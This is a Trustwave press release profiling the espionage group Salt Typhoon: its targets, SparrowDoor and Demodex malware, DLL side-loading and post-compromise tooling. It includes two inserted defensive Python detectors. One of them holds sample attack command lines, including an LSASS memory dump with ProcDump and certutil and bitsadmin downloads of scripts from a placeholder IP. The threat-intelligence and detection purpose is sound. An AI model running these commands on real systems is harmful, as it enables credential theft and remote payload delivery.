Trustwave Corporation

12/12/2024 | Press release | Distributed by Public on 12/12/2024 15:39

Analyzing Salt Typhoon: Telecom Attacker

December 12, 2024
  • Unveiling Salt Typhoon: A New Wave in Cyber Espionage
    Discover how this advanced Chinese-speaking threat actor targets telecom giants, using sophisticated tools like SparrowDoor and Demodex to breach and exfiltrate sensitive data.
  • The Who, What, and Why of Salt Typhoon's Attacks
    Gain insights into Salt Typhoon's history, tactics, and objectives, from their focus on tracking persons of interest to compromising global telecommunications and government networks.
  • Inside the Salt Typhoon Arsenal: Techniques and Tools
    Explore the group's toolkit, including custom malware, lateral movement strategies, and evasion techniques that outsmart even the most advanced forensic tools.

Salt Typhoon is a Chinese-speaking threat actor that the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have tied to a series of attacks that breached and exfiltrated data from several of the world's most prominent telecommunications companies.

Trustwave SpiderLabs has created a deep analysis of the threat group Salt Typhoon, detailing the group's history, tactics, techniques, and procedures (TTPs), and preferred targets. The gang is known to target Windows systems and leverages DLL search-order hijacking to install custom-made backdoors, notably SparrowDoor and Demodex.

"Threat actors affiliated with the People's Republic of China (PRC) have targeted commercial telecommunications providers to compromise sensitive data and engage in cyber espionage," said Assistant Director Bryan Vorndran of the FBI's Cyber Division.

Trustwave SpiderLabs reported that, like many espionage groups, this group's exact objectives and end goals remain unclear. However, based on public reports, its TTPs, malware usage, choice of victims, and later attack stages (such as data exfiltration and operational impact), a medium-confidence hypothesis suggests their main goal is tracking the movements of persons of interest.

Its targeting of hotels seems to support cyber-espionage efforts by enabling them to monitor the locations of key individuals. Similarly, their focus on telecommunications and airline companies likely serves to gather intelligence, intercept communications, or trace the movements of their targets.

Salt Typhoon's Back Story

In March 2021, during widespread exploitation of the ProxyLogon vulnerabilities, ESET identified a new cyberespionage group named "FamousSparrow," believed to have been active since 2019. ProxyLogon, disclosed in January 2021, fueled global cyberattacks, with over 10 APT groups exploiting Microsoft Exchange Server flaws. Salt Typhoon launched attacks on March 3, 2021, a day after patches were released, indicating prior knowledge of the vulnerabilities. Their primary targets included hotels, governments, law firms, and engineering firms, echoing the focus of groups like DarkHotel and APT28.

In investigating Exchange server attacks, Kaspersky linked activity to July 2020 and named the actor "GhostEmperor" for its advanced tools and anti-forensic techniques. After going quiet, the group resurfaced in late 2023 when Sygnia's Incident Response team uncovered network compromises involving Demodex, a rootkit tied to Salt Typhoon. Another lull ended in September 2024 when The Wall Street Journal reported Salt Typhoon had breached US Internet Service Providers (ISPs) in a campaign targeting sensitive information, potentially compromising Cisco routers.

Government and Criminal Affiliations

Salt Typhoon, as Microsoft tracks them, is also known by the aliases FamousSparrow (ESET), UNC2286 (Mandiant), and GhostEmperor (Kaspersky). The FBI and CISA reported it is known to be affiliated with the Chinese government.

Salt Typhoon has been linked to tools tied to espionage operations by groups like DRBControl and SparklingGoblin, which is thought to be part of the Winnti Group. However, Salt Typhoon is recognized as a distinct entity, even though it has strong connections with other Chinese APT groups and unidentified Chinese-speaking threat clusters.

According to AhnLab, Salt Typhoon has used the SparrowDoor loader, malware also associated with Tropic Trooper (APT23), which shares similarities with the Xiangoop loader. Mandiant has noted overlaps in infrastructure between UNC4841, another China-based espionage actor, and UNC2286, also known as Salt Typhoon. Trend Micro has highlighted similar tactics, techniques, and procedures (TTPs) between Salt Typhoon and Earth Estries, a cyberespionage group active since 2020.

Additionally, Salt Typhoon's primary tool, Demodex, shares characteristics with the Derusbi rootkit, which has been attributed to various Chinese-speaking threat actors. There are also notable parallels between CrowDoor and SparrowDoor, further reinforcing connections to other groups.

Salt Typhoon's Target List

The group's victims run the gamut from hotels to telecoms, but all are being attacked with an eye toward garnering information about individuals. Its recent attacks have focused on the international telecommunications industry to obtain the metadata of a large number of customers, including information on the dates, times, and recipients of calls and texts.

Trustwave SpiderLabs noted that in early 2021, Salt Typhoon focused its efforts on hotels worldwide, with a particular emphasis on Southeast Asia and notable targets in Egypt, Afghanistan, and Ethiopia. These operations extended to government entities and telecommunications companies.

The group has consistently targeted the information and communication technology sector, including wireline and wireless telephone providers, as well as internet service companies. Many of these companies maintain close ties to government agencies and the defense industrial base (DIB) of their respective countries.

In addition to telecoms and government entities, Salt Typhoon's operations have expanded to include militaries, solar energy companies, financial institutions, NGOs, international organizations, engineering firms, and law practices. Their reach spans nations such as Brazil, Burkina Faso, South Africa, Canada, Israel, France, Guatemala, Lithuania, Saudi Arabia, Taiwan, Thailand, and the United Kingdom.

Most recently, Salt Typhoon has launched a cyberespionage campaign targeting US-based ISPs. These attacks underline the group's continued focus on telecommunications, likely aiming to intercept communications, monitor activities, and enhance their intelligence-gathering capabilities.

Salt Typhoon's TTPs

Salt Typhoon's tool kit is massive, utilizing legitimate, custom-made, and borrowed tools.

Salt Typhoon is known for deploying custom backdoors, notably SparrowDoor and Demodex. SparrowDoor is a versatile 32-bit loader and backdoor targeting Windows operating systems, with capabilities such as renaming or deleting files, creating directories, shutting down processes, exfiltrating specified file contents, and establishing an interactive reverse shell. This backdoor has been consistently used in Salt Typhoon operations, including during their exploitation of the ProxyLogon vulnerability in Microsoft Exchange and other Internet-facing applications.

The malware also has a kill switch to remove persistence and all related files from a compromised system.

The group leverages DLL search-order hijacking to install SparrowDoor and establishes encrypted TLS connections for command and control (C2). The hijack abuses the legitimate executable Indexer.exe, which loads a library named K7UL.dll: a malicious DLL carrying that name, placed where Windows' search order finds it before the genuine copy, is loaded by the trusted process instead.
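A defender's check for the side-loading pattern just described, as an added example that is not code from the Trustwave report. It assumes Sysmon Event ID 7 style image-load records (Image, ImageLoaded, Signed); the Indexer.exe to K7UL.dll pairing is the one the report names, while the expected install directory and the sample events are constructed.

```python
"""Flag image-load events shaped like DLL search-order hijacking:
a watched DLL name loaded from outside its expected home, or from the
host executable's own directory, and not carrying a valid signature."""
from pathlib import PureWindowsPath
from typing import Optional

# Watched DLL names mapped to where a genuine copy may live.
# The directory is a hypothetical install path, not a value from the report.
WATCHED_DLLS = {
    "k7ul.dll": {r"c:\program files\k7 computing\k7tsecurity"},
}
HOST_EXES = {"indexer.exe"}  # legitimate executable abused as the loader


def _norm(p: str) -> str:
    return str(PureWindowsPath(p)).lower()


def classify(event: dict) -> Optional[str]:
    """Return an alert reason, or None when the load looks legitimate."""
    host = PureWindowsPath(event["Image"])
    dll = PureWindowsPath(event["ImageLoaded"])
    name = dll.name.lower()
    if name not in WATCHED_DLLS:
        return None  # not a DLL we track; ignore
    dll_dir = _norm(str(dll.parent))
    signed = str(event.get("Signed", "")).lower() == "true"
    if dll_dir in WATCHED_DLLS[name] and signed:
        return None  # expected location and signed: benign
    if host.name.lower() in HOST_EXES and dll_dir == _norm(str(host.parent)):
        return f"{host.name} side-loaded {dll.name} from its own directory {dll.parent}"
    suffix = "" if signed else " (unsigned)"
    return f"{dll.name} loaded from unexpected path {dll.parent}{suffix}"


def scan(events):
    """Return (process image, reason) for every suspicious load."""
    return [(e["Image"], r) for e in events if (r := classify(e)) is not None]


# Constructed sample events: a genuine load, a copied-out side-load, a system DLL.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\K7 Computing\K7TSecurity\Indexer.exe",
     "ImageLoaded": r"C:\Program Files\K7 Computing\K7TSecurity\K7UL.dll", "Signed": "true"},
    {"Image": r"C:\Users\Public\Libraries\Indexer.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\K7UL.dll", "Signed": "false"},
    {"Image": r"C:\Users\Public\Libraries\Indexer.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for image, reason in scan(SAMPLE_EVENTS):
        print(f"ALERT {image}: {reason}")
```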

Demodex, a rootkit used by the group, is specifically designed to hide malware artifacts and evade forensic analysis by removing PE headers from memory and implementing advanced obfuscation techniques. This obfuscation includes string encoding and API call masking, making static analysis difficult.

The group's malware also evades common forensic tools like WinDbg and Volatility, which struggle to detect Demodex's presence in memory.

Once inside a network, Salt Typhoon primarily leverages a combination of legitimate, open-source tools and some custom or lesser-known ones to steal information from infected systems and spread laterally within networks.

Key tools include NBTscan, a command-line utility for scanning networks for NetBIOS information, allowing attackers to identify logged-in users and IP addresses. PsExec, PsList, and ProcDump, from the Sysinternals suite, are used for remote process execution, listing running processes, and dumping LSASS.exe memory to capture passwords.

WinRAR is utilized to compress and exfiltrate sensitive files like images, documents, and mailbox contents retrieved via PowerShell. Certutil and BITSAdmin facilitate the downloading of malicious scripts from C2 servers, avoiding detection by common methods.

Cscript executes Visual Basic scripts, such as ListDomain.vbs, to gather information on the domain or workgroup of the infected system, while Schtasks runs and deletes scheduled tasks to evade detection.

Powercat, an open-source tool, enables communication with C2 servers, and Ladon assists in lateral movement by scanning for open ports and vulnerabilities.

The group also employs custom tools like Mimikat_ssp, a Mimikatz variant designed to evade antivirus detection, Get-PassHashes.ps1 for dumping password hashes, GetPwd for extracting passwords from memory, Token.exe to execute files with system privileges, as well as any available LOLBins.
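Detection logic over constructed process-creation command lines for the post-compromise tooling listed above, as an added example that is not code from the Trustwave report. The tool and script names come from the report; the regular expressions, rule labels and sample command lines are assumptions built for this illustration.

```python
"""Triage process command lines against the living-off-the-land tooling
the report attributes to Salt Typhoon. Input is a list of command-line
strings such as Sysmon Event ID 1 or Windows 4688 would record."""
import re
from typing import List, Tuple

# (label, pattern) pairs. Patterns are hypothetical starting points,
# tuned for readability rather than completeness.
RULES = [
    ("lsass-dump-procdump", re.compile(r"procdump(64)?(\.exe)?\b.*\blsass", re.I)),
    ("certutil-download", re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    ("bitsadmin-download", re.compile(r"bitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("schtasks-delete", re.compile(r"schtasks(\.exe)?\b.*/delete\b", re.I)),
    ("nbtscan-sweep", re.compile(r"\bnbtscan\b", re.I)),
    ("cscript-listdomain", re.compile(r"cscript(\.exe)?\b.*listdomain\.vbs", re.I)),
    ("hash-dump-script", re.compile(r"get-passhashes\.ps1|mimikat_ssp", re.I)),
    ("winrar-staging", re.compile(r"\b(rar|winrar)(\.exe)?\s+a\b", re.I)),
]


def match_rules(cmdline: str) -> List[str]:
    """Labels of every rule that fires on one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def triage(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Keep only command lines that hit at least one rule."""
    hits = []
    for c in cmdlines:
        labels = match_rules(c)
        if labels:
            hits.append((c, labels))
    return hits


# Constructed sample: one benign line followed by one line per tool family.
SAMPLE_COMMANDS = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"C:\Users\Public\procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\ls.dmp",
    r"certutil.exe -urlcache -split -f http://203.0.113.10/upd.ps1 C:\Users\Public\upd.ps1",
    r"bitsadmin.exe /transfer job /download http://203.0.113.10/a.txt C:\Users\Public\a.txt",
    r'schtasks.exe /delete /tn "Update" /f',
    r"cscript.exe //nologo C:\Users\Public\ListDomain.vbs",
    r"powershell.exe -f C:\Users\Public\Get-PassHashes.ps1",
    r"C:\Users\Public\rar.exe a C:\Users\Public\out.rar C:\Users\ad\Documents",
]

if __name__ == "__main__":
    for cmd, labels in triage(SAMPLE_COMMANDS):
        print(", ".join(labels), "<-", cmd)
```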

Additionally, Salt Typhoon's tools share similarities with malware, like Derusbi, from toolkits used by other Chinese threat groups, including APT41, APT17, Leviathan, and Stone Panda.

Derusbi is a DLL-based backdoor capable of obtaining directory, file, and drive listings; creating reverse shells; capturing screens; recording video and audio; managing processes; enumerating and modifying registry keys and values; logging keystrokes; extracting usernames and passwords from protected storage; and performing file operations like renaming, deleting, copying, moving, reading, and writing. In one instance, the attackers also deployed a variant of Motnug, a shellcode loader frequently used to load the CROSSWALK backdoor, which is part of SparklingGoblin's arsenal of .NET loaders.

What Does All This Mean?

Salt Typhoon exemplifies the advanced persistence and adaptability of state-sponsored cyber threats. By targeting key industries like telecommunications and hospitality, the group supports espionage efforts to monitor individuals and intercept sensitive data. Continued vigilance, threat intelligence sharing, and robust cybersecurity practices are vital to countering the evolving tactics of sophisticated attackers like Salt Typhoon.


ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience.